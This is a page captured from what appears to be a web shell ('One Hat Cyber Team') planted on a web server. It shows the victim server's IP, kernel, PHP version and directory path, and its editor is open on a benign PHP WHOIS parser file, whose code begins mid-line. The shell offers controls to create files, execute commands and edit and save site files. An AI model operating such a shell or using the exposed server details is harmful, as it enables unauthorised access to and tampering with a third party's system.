⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.138
Server IP:
186.226.58.36
Server:
Linux da02.sh15.net 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Server Software:
Apache/2
PHP Version:
8.1.32
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
redesystem
/
public_html
/
dist
/
libs
/
whois
/
src
/
Edit File: whois.il.php
'fax', 'e-mail' => 'email', 'nic-hdl' => 'handle', 'person' => 'name', 'personname' => 'name', 'address' => 'address'/*, 'address' => 'address.city', 'address' => 'address.pcode', 'address' => 'address.country'*/ ); $contacts = array( 'registrant' => 'owner', 'admin-c' => 'admin', 'tech-c' => 'tech', 'billing-c' => 'billing', 'zone-c' => 'zone' ); //unset($data_str['rawdata'][19]); array_splice($data_str['rawdata'],16,1); array_splice($data_str['rawdata'],18,1); //print_r($data_str['rawdata']); //die; $reg = generic_parser_a($data_str['rawdata'], $translate, $contacts, 'domain', 'Ymd'); if (isset($reg['domain']['remarks'])) unset($reg['domain']['remarks']); if (isset($reg['domain']['descr:'])) { foreach ($reg['domain']['descr:'] as $key => $val) { $v = trim(substr(strstr($val, ':'), 1)); if (strstr($val, '[organization]:')) { $reg['owner']['organization'] = $v; continue; } if (strstr($val, '[phone]:')) { $reg['owner']['phone'] = $v; continue; } if (strstr($val, '[fax-no]:')) { $reg['owner']['fax'] = $v; continue; } if (strstr($val, '[e-mail]:')) { $reg['owner']['email'] = $v; continue; } $reg['owner']['address'][$key] = $v; } if (isset($reg['domain']['descr:'])) unset($reg['domain']['descr:']); } $r['regrinfo'] = $reg; $r['regyinfo'] = array( 'referrer' => 'http://www.isoc.org.il/', 'registrar' => 'ISOC-IL' ); return $r; } }
Simpan